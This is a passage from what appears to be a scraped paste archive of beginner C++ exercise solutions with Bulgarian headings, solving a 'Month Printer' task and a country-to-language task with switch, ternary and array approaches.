cout << language << endl; + return 0; +} + +Решение с тернарен оператор: + +#include + +using namespace std; + +int main() { + string country; + getline(cin, country); + + string language = + country == ""England"" || country == ""USA"" ? ""English"" : + country == ""Spain"" || country == ""Argentina"" || country == ""Mexico"" ? ""Spanish"" : ""unknown""; + + cout << language << endl; + return 0; +}" +EB1ytLeR,03. Month Printer,Spocoman,C++,Thursday 2nd of November 2023 07:12:23 AM CDT,"Решение със switch: + +#include + +using namespace std; + +int main() { + int number; + cin >> number; + + string result = """"; + + switch (number) { + case 1: + result = ""January""; + break; + case 2: + result = ""February""; + break; + case 3: + result = ""March""; + break; + case 4: + result = ""April""; + break; + case 5: + result = ""May""; + break; + case 6: + result = ""June""; + break; + case 7: + result = ""July""; + break; + case 8: + result = ""August""; + break; + case 9: + result = ""September""; + break; + case 10: + result = ""October""; + break; + case 11: + result = ""November""; + break; + case 12: + result = ""December""; + break; + default: + result = ""Error!""; + break; + } + + cout << result << endl; + return 0; +} + +Решение с тернарен оператор: + +#include + +using namespace std; + +int main() { + int number; + cin >> number; + + string result = + number == 1 ? ""January"" : + number == 2 ? ""February"" : + number == 3 ? ""March"" : + number == 4 ? ""April"" : + number == 5 ? ""May"" : + number == 6 ? ""June"" : + number == 7 ? ""July"" : + number == 8 ? ""August"" : + number == 9 ? ""September"" : + number == 10 ? ""October"" : + number == 11 ? ""November"" : + number == 12 ? ""December"" : ""Error!""; + + cout << result << endl; + return 0; +} + +Решение с масив: + +#include + +using namespace std; + +int main() { + int number; + cin >> number; + + string months[13] = { + ""Error!"", + ""January"", + ""February"", + ""March"", + ""April"", + ""May"", + ""June"", + ""July"", + ""August"", + ""September"", + ""October"", + ""November"", + ""December"" + }; + + cout << months[number > 0 && number < 13 ? number : 0] << endl; + return 0; +}"